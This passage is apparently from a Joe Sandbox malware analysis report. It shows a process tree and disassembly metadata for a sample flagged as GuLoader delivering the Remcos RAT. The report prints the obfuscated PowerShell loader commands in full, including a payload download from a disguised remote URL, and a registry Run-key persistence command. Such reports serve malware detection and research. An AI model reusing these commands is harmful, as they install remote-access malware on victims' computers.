l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');while (!$Unadduceable) {auspiciums (Hjemmemarkedernes ' $HegMilV oAdbA a DlD :KoSf t a da MlBrt,raSkn NkKde = A$PrMJ.e nd,t KaT,3M 8') ;auspiciums $Internes;auspiciums (Hjemmemarkedernes ' GsBltInaHeRBlTPa-S.sOlLnoEK EOxP S Qu4');auspiciums (Hjemmemarkedernes ' $ gKaLReo ,BriAbrl a:JuuUdN DAStDC dIrUVecSuEElaPabSalKaeF,=La( Otb e aSFoT -OmPN aSaTGlh b T$AfoUrk SVaE ,JT e M)') ;auspiciums (Hjemmemarkedernes 'Ch$FlGS,L ,oApBPraTrL o:NyR neUnsW usaBCosTit CADinFrt IbaA.lTBlI tnR g =Un$PuG.kL sOStbFiaCoL,i: UA GSMiHOsL ER s,as s+De+A %Un$PeRtoI onBonObi rEFo.RucSeoBluCoNPaT') ;$Ammunitionsfabrikkens=$Rinnie[$Resubstantiating]}$Catfacing=330712;$Phoning197=28597;auspiciums (Hjemmemarkedernes 'To$SmGjeL CoOvbUna uL A: GOH vlaED R,hc aH,P.nI etR A oL ,IMozMae = O CgCyeS tBa-O.cVaOFoNS.tTrE.uNSiT,r u$Pho TKGus,nE OjP e');auspiciums (Hjemmemarkedernes 'Co$OrgEplFaoMebSvaMilaf:,oFBarAna fS.rFlsE e ,lBleFrnS ,e=Cy ,[ iSBrylnsC t,heDim . CP,ofonMevr.eRnrBrt ]D.:Ma: VF Br tor m rBIsa esBeeFi6 T4 BSAbt .r diO nR gS ( i$.eO vA e rSkcFoa tpGti DtSca Sl siOvzB eSn)');auspiciums (Hjemmemarkedernes ' e$AfGSaLRoO rb,raAml.e: Ap Ve ynE.tSeA esSct Fo ,mInuBomAg Li=Ou [EnS Y uSG.T leG MOp.AfTPse.uxErtCa. rEPeNT.CLaODoD .iUnNAng r] A: ,:p A iS ecPhiDaiO .v gSlEPrtP S VtK r IB.NDegMa(sc$ByF Tr eA ifMaROpS,oeK L pEAnNqu)');auspiciums (Hjemmemarkedernes ' i$GrG hL ounBMea slFc:Udh pU aR ST iIHjGPar dUsuTAvECer ,SU =un$U,P PeRuN ,tL aFesRhTH,OMiMSouA MEv.BrS.eU bHeSTet ,rcai.in BgUl( $Soc a TSufO.aLoCKeI ,NOrGLe, s$ Fp eHlaORenBai eNReGGr1 9M 7In)');auspiciums $Hurtigruters;"
                                                                          Imagebase:0xf20000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3005727829.0000000007DB5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2994471945.0000000006C8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2952642850.000000000064A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.3008275898.0000000007F80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2981270459.000000000554E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:4
                                                                          Start time:14:15:08
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:8
                                                                          Start time:14:15:33
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)"
                                                                          Imagebase:0x240000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:9
                                                                          Start time:14:15:33
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:10
                                                                          Start time:14:15:33
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)"
                                                                          Imagebase:0x480000
                                                                          File size:59'392 bytes
                                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:14:15:45
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\romerret.vbs"
                                                                          Imagebase:0xbb0000
                                                                          File size:147'456 bytes
                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:14:15:45
                                                                          Start date:30/11/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Schr. an GGV bzgl. Schadenersatzes.pdf"
                                                                          Imagebase:0x7ff6bc1b0000
                                                                          File size:5'641'176 bytes
                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:13
                                                                          Start time:14:15:45
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Boernehjaelpsdag='Flerbrugerudgaver';;$Anekdotiskes='Kvajer';;$Apathia='Gunbuilder';;$Meterologisk='Billioners174';;$Paracelsianism='Intervertebra';;$Claritude=$host.Name;function Ructation($Krselstiderne){If ($Claritude) {$Slutdatoerne=2} for ($Unglamorously=$Slutdatoerne;;$Unglamorously+=3){if(!$Krselstiderne[$Unglamorously]) { break }$Buckland+=$Krselstiderne[$Unglamorously]}$Buckland}function Fashioneringer($Marins){ .($Clodpoles) ($Marins)}$Paydays=Ructation ' ln eamtSp. yW BEreb C uL SiLeeDoNTrT';$Nedsivningsbekendtgrelsernes=Ructation 'FuMCroDazI iMelGolDeaSl/';$Kongeparrets=Ructation ' MTRilI.sr 1 f2';$Dorbugs28='An[ManP,e StBa. .sTmE RR ivTii c oERaP.ioC iF N UT.om Ac N,ea RGBeEAnrA ]Hy:Be:U.sKoENaC ouRaRMiiS T DYOmpStrA,o TReoPrCVeOHaLte=st$MoKBeoarnTiGRaE p .AKaRN RCrEdiTN.s';$Nedsivningsbekendtgrelsernes+=Ructation 'Bi5W .Re0Wi (PeWDiiManAnd okawMas S ,tN .TKa Fo1 U0 R.D,0 G;Py MaWHoiFin o6vr4.n;gr Krx .6Be4C.; arA vUn: S1Me3S 1 D.b 0W,) . uG ae LcDikInoBr/ u2.s0 .1Fu0 ,0 C1Gl0.a1Be VeFRii .rTreKaf.oo .x H/A 1Gn3 u1Pe.Ek0';$trevrelserslejligheds=Ructation 'O,U SB EbrRD -B,aSkGAfE Kn Ut';$Fishgrass=Ructation 'Gehs.tStt.ppSksEs:C /t,/ ,wSowDew r.HueAllQuePhk JtRerFro,rs eserU vPaiUnc HeVi-GanJ e uO rdyu DpD pQui n o.AkdE eFl/LnfBriFulR eHaa adRam RiPon.a/T wU o jl.rtBieBoreq/ ,O vDie arHop,ya Eir nF f CuT,lBo.T aUnfDem';$Korporal=Ructation 'Re>';$Clodpoles=Ructation 'UniD EguX';$Overgrnserne='Orthopterological';$Undladelsers='\Milieuplanerne.Chl';Fashioneringer (Ructation 'Fy$FrGElL FoNib iaRaL,t:FoUP nMovFoAhyl ISedP l ,yR,= S$R EA nK v :Ova P.apamdAmaMeTMoAba+ a$PhU anUpdy,lsua BDdieLdL sSKle kRUnS');Fashioneringer (Ructation '.r$EkgcaL ,oTeBPaa Dl U: aFMarAfE TMIdTUnvSku nN PGOveSnt u= m$ LfCuIlas Dh CgOvRHaASpSFoSAs. BsExP olcyIPoTop( u$LakIno RLePgno SrM.ABel I)');Fashioneringer (Ructation $Dorbugs28);$Fishgrass=$Fremtvunget[0];$Tilmeldtes=(Ructation 'Op$EcgInlA o eBB aOxLSt: ,GS.a iRSkAHymBlOR Nr,DTh= ON.rE rWB -V oBobByJ.rENoCFit PrsStYT sDiT uEEnmF,.Tr$AfpPaA aY GdG a sy s');Fashioneringer ($Tilmeldtes);Fashioneringer (Ructation 'Ep$PagFjaForLuaA.mOvo enP d O.ovHRieP aF dBoemor.esPe[ u$RetArr Le Tv vr.reRel is ,e ir .sStlAeeT j lSii gAnhTreStdB sDe]Pa=D $ NAmeEld.usB i.iv.unEfiE nMagC,sPrb meb,kAne rnS,d tUfg kr.oe Ll BsIneSlrK.nPre Ms');$Almugs=Ructation 'Sp$Nogska IrAraItm PoPen SdAm. aDCeo iwEpn Pl ao Na edB FDii ol.reMo(Yd$ FFP.iP,sPah g.or.aaSos WsLa,Im$ TSA.t naLnt,us b.ae Ms gAfe fnPre sS )';$Statsbesgenes=$Unvalidly;Fashioneringer (Ructation 'Ha$ GArLNeoBrB CaHaLTe:abIPrdBee ,aRelMeiSaZSpeSer.r= ,( STSteGes aTRe-TrpNaaT TKohAc S $ ,SAntInADgt SsRaBMoe CsMegBie RN de.fSEf)');while (!$Idealizer) {Fashioneringer (Ructation ' k$ SgNol PoAnb Sa dl.e: hA.upEntK,e.wrFeiOpn gFaeSkrYnnb eo s ,=,k$PlH oyChlReeStr.qn .esusVa5Pl4') ;Fashioneringer $Almugs;Fashioneringer (Ructation 'O sLetNeaExrKaTTa-N,SSula.EMaEhjP,o Do4');Fashioneringer (Ructation 'pl$L,gL l SOSeBCoAUnlA :FoireDSwEHvAR.L .i kZ SEAnrI =In( LT SeKnsf,Tti-C P gAShtSvHHu .a$ SUlt aMitXySDvb VEYaS SGsle ,n,nE S )') ;Fashioneringer (Ructation 'Ra$ Bg LO O BNoaU,LH,:YeB TABrr SbLuA CsMaCSuoDeSfo=Sl$S gk L eo Ab uA ML A:S,vJoA dIleAnSLat eeDiD lE SRKoN PE I+P + p%Un$Enf orTie,rMDoTNivr U,hnPrGIsE ut .GucP OHeUOpNV.T') ;$Fishgrass=$Fremtvunget[$Barbascos]}$Benaadningerne=316180;$Renummereringsfunktionens164=29066;Fashioneringer (Ructation ' $U GLeL DOO B.rABrlBr:S.dUnIdosOvp loP N eUnR HeVat , .u=r. LeG,ee tSy-u CStOCunNoT FEDaNXeTWh Pr$ rsSktHaAS T US BB CeUrs RgLiE dn,oE SS');Fashioneringer (Ructation 'Ke$ DgP,l ioH b aTel :BuEBrt.ohM.y l nsMauInlampF hPru KrHeiPec a d =Ry [ FSlayE,s ItAle umOv.,mC UoMon,cvBae ,rDetOp] a:Un:TuFCurLyoLamPaBC a sSneDe6hy4UnS EtTor fi onTig,i(.a$AwD.ei esNop,eossnH eGerreelrt v)');Fashioneringer (Ructation 'Ze$ oG olF oPeBOraenlHe: Ss ,h .IBemA.O N.aOUnsSyE aKQuIFi ,e=Ri R[A SStyEpsCrTdaE M,h.butmyETaxV TNy.HeeUdNKoCinOBodS,i an SgSu] l: ,:FuA oS CCReI IYd.PegG eTrTT S.otCir GiDeNAiGMa(K.$NoeenT HSkyDiL Tsnou.elu pC.HPsUPhRBuIIncHo)');Fashioneringer (Ructation 'tr$Ing ,LLeO obF.A SL B:.rkSgO iBrnStOFoNRu= R$ .sAphUnI rm HoP.Nh.OCaS CERukMii .Ses.vU ABRrsNut aR.rIspN fGRe(Gt$ ab .eVun A ,aDeD ,nPriKaN Gg DERiRAnN eEBo,Sk$UnR,ue FNPau RmSpm HE SRUnEDaRKuiK,NNegSuSkoFBru SnSukstt i MoQunSceSpnShS a1P.6Fr4 k)');Fashioneringer $Koinon;"
                                                                          Imagebase:0xf20000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.3009830542.00000000091F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.3010102777.00000000093F8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.2989299356.0000000005D55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:14
                                                                          Start time:14:15:45
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:15
                                                                          Start time:14:15:46
                                                                          Start date:30/11/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                          Imagebase:0x7ff74bb60000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:16
                                                                          Start time:14:15:46
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\System32\svchost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                          Imagebase:0x7ff6eef20000
                                                                          File size:55'320 bytes
                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:17
                                                                          Start time:14:15:47
                                                                          Start date:30/11/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1756,i,10988508306873604360,9647828902671235377,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                          Imagebase:0x7ff74bb60000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Executed Functions

                                                                            Function 00007FFD9B8AAB32 Relevance: 3.0, Strings: 2, Instructions: 476COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1851787476.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: c$c
                                                                            • API String ID: 0-2424536367
                                                                            • Opcode ID: bd28c1ee672db5572e2790e019c0f70690d0894e87aea08a672e4abacf124aca
                                                                            • Instruction ID: 9ecdd6bc9885470c56f06f99ce2011a7e20504b7dc438729641196b1e467784b
                                                                            • Opcode Fuzzy Hash: bd28c1ee672db5572e2790e019c0f70690d0894e87aea08a672e4abacf124aca
                                                                            • Instruction Fuzzy Hash: 17F1A330A09A4D8FEBA8DF68C8567F937D1FF58311F00426AE84DC76A5DB349A418B81
                                                                            Function 00007FFD9B8AB8D2 Relevance: 3.0, Strings: 2, Instructions: 458COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1851787476.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: c$c
                                                                            • API String ID: 0-2424536367
                                                                            • Opcode ID: 926a3441f90100a4356facb414330fc256352768c529d43d35b22b941e4589de
                                                                            • Instruction ID: 8f01bc83d51adb26ea06ee7f30126ed56c4c170f5b3114ba9929954b2eba07d5
                                                                            • Opcode Fuzzy Hash: 926a3441f90100a4356facb414330fc256352768c529d43d35b22b941e4589de
                                                                            • Instruction Fuzzy Hash: 50E1C630A09A4D8FEBA8DF68C8657E977D1FF58310F04426ED84DC72A5DF74A9418B81
                                                                            Function 00007FFD9B9753BA Relevance: 2.9, Strings: 2, Instructions: 376COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6$6
                                                                            • API String ID: 0-989284199
                                                                            • Opcode ID: e0a6aba8699b4fabf58f1edd71213d40accea5d4148890caaacd2d20a04a2f30
                                                                            • Instruction ID: e381499cde441f15714c93204dd9d8b9a8b79f9454ac2505ec7c92e96b1e74bb
                                                                            • Opcode Fuzzy Hash: e0a6aba8699b4fabf58f1edd71213d40accea5d4148890caaacd2d20a04a2f30
                                                                            • Instruction Fuzzy Hash: 6CB16732B1EA8E1FEBE5D76C58A15B87BD1EF55210B0900BBD45DCB1E3ED18AC058381
                                                                            Function 00007FFD9B8AB4E6 Relevance: 2.8, Strings: 2, Instructions: 330COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1851787476.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: c$c
                                                                            • API String ID: 0-2424536367
                                                                            • Opcode ID: fe90bcf8865cd91c008491fbd05e6c16cf5a52db71545ae4f5870ce239ecfa44
                                                                            • Instruction ID: ae693f9935a14f18aa59a90c94e3d59fb3d58a9da83b75c48e369dd8427750af
                                                                            • Opcode Fuzzy Hash: fe90bcf8865cd91c008491fbd05e6c16cf5a52db71545ae4f5870ce239ecfa44
                                                                            • Instruction Fuzzy Hash: 96B1B53060DA4D8FDB68DF28D8557E93BE1FF59310F04426EE84DC72A1DB74A9418B82
                                                                            Function 00007FFD9B9790DA Relevance: .7, Instructions: 694COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 50dad03f987a7cefed637b712503e83e0d5feb21f601a59b7116a16cc8dab956
                                                                            • Instruction ID: 1aeeb69fca96eae3f27926beb81d2110b1dcf96f8f4bc7f6a94fbcc00e0fa971
                                                                            • Opcode Fuzzy Hash: 50dad03f987a7cefed637b712503e83e0d5feb21f601a59b7116a16cc8dab956
                                                                            • Instruction Fuzzy Hash: 6F220822B1EBC92FE766976C48A95687BE1EF56210F1901FED09CCB1E3DE186C45C342
                                                                            Function 00007FFD9B8ACFCF Relevance: .7, Instructions: 666COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1851787476.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b46dcdef54ec66209c129dd2cae1de7c0e67ab4a0c0c69791062198700984c5e
                                                                            • Instruction ID: 252f610f945f818ef32c42a7bb2af9833a33b599b560a0762ba0c457421d0d63
                                                                            • Opcode Fuzzy Hash: b46dcdef54ec66209c129dd2cae1de7c0e67ab4a0c0c69791062198700984c5e
                                                                            • Instruction Fuzzy Hash: 46225130A18A4D8FDF98EF5CC4A5AA9B7E1FFA8310F114169E409D7295DB35F881CB81
                                                                            Function 00007FFD9B974351 Relevance: .7, Instructions: 651COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2cc9a36d1af464289b798a487705a72394742fa81c54041fedae45ecd5fa1888
                                                                            • Instruction ID: 4539bb7e2a8e621f44991b249af76454287a01d1cff7dc186a24f454ba8885d3
                                                                            • Opcode Fuzzy Hash: 2cc9a36d1af464289b798a487705a72394742fa81c54041fedae45ecd5fa1888
                                                                            • Instruction Fuzzy Hash: 01121922B1FBCA1FE76A966858B52B87BD1EF52210B1901FFD09DC72F3ED1869058341
                                                                            Function 00007FFD9B97A6CA Relevance: .5, Instructions: 506COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd562972713da06b779c65cefae15e9092f1573f3005d6eeba76ea879eddaa89
                                                                            • Instruction ID: 6319c5cd6b1b374c7ff684e81b270f7f9e1a75a395436742b81683c857efefbc
                                                                            • Opcode Fuzzy Hash: cd562972713da06b779c65cefae15e9092f1573f3005d6eeba76ea879eddaa89
                                                                            • Instruction Fuzzy Hash: 35F14922B1EB8D1FE7669B6848A52A87BE1EF55210F1A01FED05CC71E3DE18AD458342
                                                                            Function 00007FFD9B9788C2 Relevance: .5, Instructions: 499COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1852160941.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dec71991d9f5ca729133d6f25d84c685ddd5265b00b1493d9861866487ef1048
                                                                            • Instruction ID: bcf6cbcaa82542f332e8a4e936b6ab9b2715d59c7d874a6cf199406c3a731ee0
                                                                            • Opcode Fuzzy Hash: dec71991d9f5ca729133d6f25d84c685ddd5265b00b1493d9861866487ef1048
                                                                            • Instruction Fuzzy Hash: F0F13871A1E7CA5FE766877948E56647FE0EF52310B1A01FBC089C71E3DE18A806C352
                                                                            Function 00007FFD9B979F11 Relevance: .5, Instructions: 455COMMON
                                                                            Download Yara Rule
